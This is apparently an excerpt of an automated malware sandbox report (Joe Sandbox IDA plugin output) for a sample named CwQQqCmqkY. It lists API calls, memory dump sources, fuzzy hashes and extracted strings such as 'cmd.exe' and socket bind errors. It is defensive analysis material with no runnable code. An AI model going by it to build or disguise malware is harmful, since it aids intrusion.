                    • Instruction Fuzzy Hash: CB228D32B08B4286EB10EFA9E4506A9B7A4FF44B94F854039DA6D837D4EFBCD455C390
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Crypt$Hash$Param$ContextDestroyRelease
                    • String ID:
                    • API String ID: 2110207923-0
                    • Opcode ID: 8036c8465d3e1957d520ff9ed75ab888746bb8647a4f93dc55eeb927d4503f62
                    • Instruction ID: eeb5049cac0606979cecf688335e572f841248e2337b3d848457be10c9c71f7e
                    • Opcode Fuzzy Hash: 8036c8465d3e1957d520ff9ed75ab888746bb8647a4f93dc55eeb927d4503f62
                    • Instruction Fuzzy Hash: 01018F6A70864586EB10DF65E45432AF370FF84B84F944035DA5D46AA8CF7DD444CBA0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _get_daylight$_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 1286766494-0
                    • Opcode ID: f4c3e483ea8825688196959c4c1cecb123d2989cce997fc0fe8636b975c878ea
                    • Instruction ID: 923e34f30287d4969a16f31b2373d24a26d7efe4cb544a5a35e91e7e591188be
                    • Opcode Fuzzy Hash: f4c3e483ea8825688196959c4c1cecb123d2989cce997fc0fe8636b975c878ea
                    • Instruction Fuzzy Hash: C292F532D0868287D724AF249560179B7A5FF847A8F864139DB9D27BD8DFBCD510C3A0
                    APIs
                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1320683
                      • Part of subcall function 00007FF7F1303258: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7F1303207,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F1303261
                      • Part of subcall function 00007FF7F1303258: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7F1303207,?,?,?,?,00000000,00007FF7F13030F2), ref: 00007FF7F1303286
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                    • String ID: PATH$\
                    • API String ID: 4036615347-1896636505
                    • Opcode ID: f9c09e629afdb956bd6d43dcce996c1485f31addbb4285abb05a7d0152a709e6
                    • Instruction ID: bfff0ffabd142fd580e1155616e38bd36fe654bd13e6b458c3d7fe7eaedc806e
                    • Opcode Fuzzy Hash: f9c09e629afdb956bd6d43dcce996c1485f31addbb4285abb05a7d0152a709e6
                    • Instruction Fuzzy Hash: E391E662F0828687FB64BB61541027EA6E06F40798F94057CDE3E077D6CFFDA44582E1
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLastbind
                    • String ID: bind() failed; %s
                    • API String ID: 2328862993-1141498939
                    • Opcode ID: 99400ffd2d1bc5ff557757cc4172926078d032e46def15c2dff9d9193e9be3d4
                    • Instruction ID: 9ab4393d3fc27dcde61bfb2de3e53c7386120a17239992c9ff36bc24f64d5622
                    • Opcode Fuzzy Hash: 99400ffd2d1bc5ff557757cc4172926078d032e46def15c2dff9d9193e9be3d4
                    • Instruction Fuzzy Hash: 4D51BE32A08B8286E715AF25E8547A9B3A4FF48B84F840039CE6D87781DF7CE551C7A0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLastbind
                    • String ID: bind() failed; %s
                    • API String ID: 2328862993-1141498939
                    • Opcode ID: c2332c4a382c98373413cc2f2609190650d36e5367d414fb5382a81917a1e6a8
                    • Instruction ID: 59637b77e27131c101c136ec12fe11651c193f1bf1e9c9b911e3104c21698041
                    • Opcode Fuzzy Hash: c2332c4a382c98373413cc2f2609190650d36e5367d414fb5382a81917a1e6a8
                    • Instruction Fuzzy Hash: 5851A432B08B8186E711AF65D8403A9B395FB58B88F440035DE1D8B7D5DFBCD441C3A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: memcpy_s
                    • String ID:
                    • API String ID: 1502251526-0
                    • Opcode ID: 58c5b441fcc557dde308f798edace5a3fe026a1be206aa60db9152cb5b0e9c63
                    • Instruction ID: e0331b25a75fa402ff4cc38e24753be5171af211c86534b1533241d0acee4cda
                    • Opcode Fuzzy Hash: 58c5b441fcc557dde308f798edace5a3fe026a1be206aa60db9152cb5b0e9c63
                    • Instruction Fuzzy Hash: 4AC12672F1828587D724DF15A08466AF791FB88794F828139DB5E67784DF7EE801CB80
                    APIs
                      • Part of subcall function 00007FF7F131B1CC: GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
                      • Part of subcall function 00007FF7F131B1CC: FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
                      • Part of subcall function 00007FF7F131B1CC: SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B
                      • Part of subcall function 00007FF7F131B1CC: FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B211
                    • GetLocaleInfoW.KERNEL32 ref: 00007FF7F1325914
                      • Part of subcall function 00007FF7F131BB6C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F131BB89
                    • GetLocaleInfoW.KERNEL32 ref: 00007FF7F132595D
                      • Part of subcall function 00007FF7F131BB6C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F131BBE2
                    • GetLocaleInfoW.KERNEL32 ref: 00007FF7F1325A25
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: InfoLocale$ErrorLastValue_invalid_parameter_noinfo
                    • String ID:
                    • API String ID: 1791019856-0
                    • Opcode ID: e9621d82364b3e643cccb06ae7a219c4f5eb04d529526534056fbe493e2e8778
                    • Instruction ID: 2074669730df2f1152ef9a2bf639d9b6c589e909fd2da2a6bcd1544ffd789d39
                    • Opcode Fuzzy Hash: e9621d82364b3e643cccb06ae7a219c4f5eb04d529526534056fbe493e2e8778
                    • Instruction Fuzzy Hash: 1561A132A0868287EB30BF11D5812B9B3A1FF44750F848139CBAE836D5DFBCE5518B90
                    APIs
                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F131FF6D
                      • Part of subcall function 00007FF7F131ACC0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F131ACE5
                      • Part of subcall function 00007FF7F1329988: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F13299B0
                      • Part of subcall function 00007FF7F131B6E0: RtlFreeHeap.NTDLL(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B6F6
                      • Part of subcall function 00007FF7F131B6E0: GetLastError.KERNEL32(?,?,?,00007FF7F1324076,?,?,?,00007FF7F13243F3,?,?,00000000,00007FF7F1324A8D,?,?,?,00007FF7F13249BF), ref: 00007FF7F131B700
                      • Part of subcall function 00007FF7F1320180: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F13201BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: _invalid_parameter_noinfo$ErrorFreeHeapLast
                    • String ID: .com
                    • API String ID: 3231943733-4200470757
                    • Opcode ID: 1fc83e35b853aa723a29c1be1801cb44bc7414c3d3ec3549f2b183986f106b57
                    • Instruction ID: 9597b9117eab405f0f8a97722a2e2a37dfc4f43322ec02dd81f8e3ca92204e16
                    • Opcode Fuzzy Hash: 1fc83e35b853aa723a29c1be1801cb44bc7414c3d3ec3549f2b183986f106b57
                    • Instruction Fuzzy Hash: 0D51B115F0928247FB58BA2298111BAD6819F44BE4FC9463DDE3D477C6EFBDE40842E0
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: InfoLocale
                    • String ID: GetLocaleInfoEx
                    • API String ID: 2299586839-2904428671
                    • Opcode ID: ae89882cadfabe5370a4b142e352b083926c22427122065ebf1ff8dc6b4f3545
                    • Instruction ID: 0485d4ce5c585fbe2f6ca7bbae4296ac8f09bf48eff07a1b30b0181f85ff70a4
                    • Opcode Fuzzy Hash: ae89882cadfabe5370a4b142e352b083926c22427122065ebf1ff8dc6b4f3545
                    • Instruction Fuzzy Hash: 82017121F0864286E740AB56B4000AAE6A0AF84BD0F944039DE5D13799CFBCE5418390
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: CurrentProcesshtons
                    • String ID:
                    • API String ID: 2530476045-0
                    • Opcode ID: 868bba0e5ea3588baa2e0886c201d3e6b5ef66e05ce2cbe54c1e9cd490a4f605
                    • Instruction ID: 9bd5589faef79e598c08e3f2fec325a0a78b95dfcb804cf80165debea363f00f
                    • Opcode Fuzzy Hash: 868bba0e5ea3588baa2e0886c201d3e6b5ef66e05ce2cbe54c1e9cd490a4f605
                    • Instruction Fuzzy Hash: FD017C229247D0CAD304CF35E5001AD77B0FB68B48B44961AFB9987A58EB78D6E0C744
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: a/p$am/pm
                    • API String ID: 0-3206640213
                    • Opcode ID: 52c76232a29cac05a79f6a47eb8daabe339cc537beb659380971972588e0868f
                    • Instruction ID: 40b955ed3e7cb5b3f2d7e3e61021330cd71d26397b142883effb0e5c63f81d03
                    • Opcode Fuzzy Hash: 52c76232a29cac05a79f6a47eb8daabe339cc537beb659380971972588e0868f
                    • Instruction Fuzzy Hash: 04E1E722E4828287F764AF1482545B9B7A1FF107A5F96413BDA2E236C4DF7CE941C3A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Heap$AllocErrorFreeLast_invalid_parameter_noinfo
                    • String ID: Syst$emRo
                    • API String ID: 3361962657-2127360862
                    • Opcode ID: b9ffde858468807ccfccbf4fea28965396f61f0720bedf05a98161954030fc29
                    • Instruction ID: 3b2d3d3fb04ad2566ab6d7bdb2bf7352ea13be8c47640124efbb3d56de138e52
                    • Opcode Fuzzy Hash: b9ffde858468807ccfccbf4fea28965396f61f0720bedf05a98161954030fc29
                    • Instruction Fuzzy Hash: ECB1E522F086A647FB10FB2194211BDA7A0AF55BA4F844579DE6E077C9DFBCE441C3A0
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorFreeHeapLast
                    • String ID: COMSPEC$cmd.exe
                    • API String ID: 485612231-2256226045
                    • Opcode ID: 07435ee56794d87a751827999ce88dd16743ba0e3ce7b8fcb190b0e72378318c
                    • Instruction ID: 8f14c6ffcf9ce2f87afc31369d004f784addf93190616831f0eeb002ae453d7d
                    • Opcode Fuzzy Hash: 07435ee56794d87a751827999ce88dd16743ba0e3ce7b8fcb190b0e72378318c
                    • Instruction Fuzzy Hash: 17318336F0874686F714FBB694514ADA3E4AF88758F880539DE2D576DACF79D00083A0
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: Info
                    • String ID:
                    • API String ID: 1807457897-0
                    • Opcode ID: 78c9213601d1c03f31e01f22b06d0bb6a4a3aef194d8807f1021b249d99e1a07
                    • Instruction ID: 7c082e22ac49cce62a0bae40aa1e5db865b90f46de89e5c50cc60a24f5b3014f
                    • Opcode Fuzzy Hash: 78c9213601d1c03f31e01f22b06d0bb6a4a3aef194d8807f1021b249d99e1a07
                    • Instruction Fuzzy Hash: E312DE22E08BC586E751DF3994052FDB3A4FF58758F469239EBAC92292DF78E190C350
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bb38fcbf89dbfde70ccf7e220177ef70d40903f3dda1410dc1f57cf82e95ef2e
                    • Instruction ID: 7a802cb311cabb7c1037b17d2e108be88f7a19701d8ac0ce65c7174cb065702b
                    • Opcode Fuzzy Hash: bb38fcbf89dbfde70ccf7e220177ef70d40903f3dda1410dc1f57cf82e95ef2e
                    • Instruction Fuzzy Hash: 70E1B172A04B9586E720EB61E4412EEA7A0FF58788F804535DF9E53B86EFBCD245C350
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: GMT
                    • API String ID: 0-2739267314
                    • Opcode ID: 71079b01f291ca49bc93343a6eaff6e67d94e7b06b7d08ec1a74bc346daa3a45
                    • Instruction ID: c56f383d10b3de6728ddf8949b768355aa67ba4eac70159b4419d21b98b6af48
                    • Opcode Fuzzy Hash: 71079b01f291ca49bc93343a6eaff6e67d94e7b06b7d08ec1a74bc346daa3a45
                    • Instruction Fuzzy Hash: AA022272F0858646EB26AA5894403B8F791FB457B4FC44235DB7E837C1EBBCA941CB90
                    Strings
                    • M&S works hard to make better products and shops. They want to sell even more in the next years., xrefs: 00007FF7F128D32B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID:
                    • String ID: M&S works hard to make better products and shops. They want to sell even more in the next years.
                    • API String ID: 0-2797344925
                    • Opcode ID: 158b8cbcebd98df24b440e78477ae21f9172c837e58ddc6f753fe1cb96dc9b3d
                    • Instruction ID: 5efbde054b8f6ff51cf54c12c5d031f851d87f18c7069a28b4ccbde57400103e
                    • Opcode Fuzzy Hash: 158b8cbcebd98df24b440e78477ae21f9172c837e58ddc6f753fe1cb96dc9b3d
                    • Instruction Fuzzy Hash: A5B13673B0458947EB15DB69D444569B3A1B794BE4F848132CA6EC7B84DF7CE80DC780
                    APIs
                      • Part of subcall function 00007FF7F131B1CC: GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
                      • Part of subcall function 00007FF7F131B1CC: FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
                      • Part of subcall function 00007FF7F131B1CC: SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B
                      • Part of subcall function 00007FF7F131B1CC: FlsSetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B211
                    • GetLocaleInfoW.KERNEL32 ref: 00007FF7F1325B58
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLastValue$InfoLocale
                    • String ID:
                    • API String ID: 673564084-0
                    • Opcode ID: 3e193f239dcf7a728e25989ea658240e7519612e54f0cf54824455059ecb164b
                    • Instruction ID: 86274df5108468ae529891f1ead506e2e935c6ee2e8583a6a001d7778ecc5144
                    • Opcode Fuzzy Hash: 3e193f239dcf7a728e25989ea658240e7519612e54f0cf54824455059ecb164b
                    • Instruction Fuzzy Hash: 03317531A0868287EB24AF21D4413E9B3A0FF48781F849179DA6D836D9DFBCE5418B90
                    APIs
                      • Part of subcall function 00007FF7F131B1CC: GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
                      • Part of subcall function 00007FF7F131B1CC: FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
                      • Part of subcall function 00007FF7F131B1CC: SetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B27B
                    • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF7F1325F2F,?,00000000,00000092,?,?,00000000,?,00007FF7F1314C2D), ref: 00007FF7F13257DE
                    Memory Dump Source
                    • Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true
                    • Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd
                    Similarity
                    • API ID: ErrorLast$EnumLocalesSystemValue
                    • String ID:
                    • API String ID: 3029459697-0
                    • Opcode ID: 2f92ca270646feb76560f124390181fc265c3ea606fbccee4c2dd3051953e7c7
                    • Instruction ID: 2383c8c96943b137bea5f972acf6f59d88202b8dfe2f9678f91e79c61db770ff
                    • Opcode Fuzzy Hash: 2f92ca270646feb76560f124390181fc265c3ea606fbccee4c2dd3051953e7c7
                    • Instruction Fuzzy Hash: A511D267E18685CAEB14AF19D0406A8BBA0EF90FA0F844139D629433C4CFB8D6D1CB90
                    APIs
                      • Part of subcall function 00007FF7F131B1CC: GetLastError.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1DB
                      • Part of subcall function 00007FF7F131B1CC: FlsGetValue.KERNEL32(?,?,?,00007FF7F130AB19,?,?,?,?,00007FF7F1281185), ref: 00007FF7F131B1F0
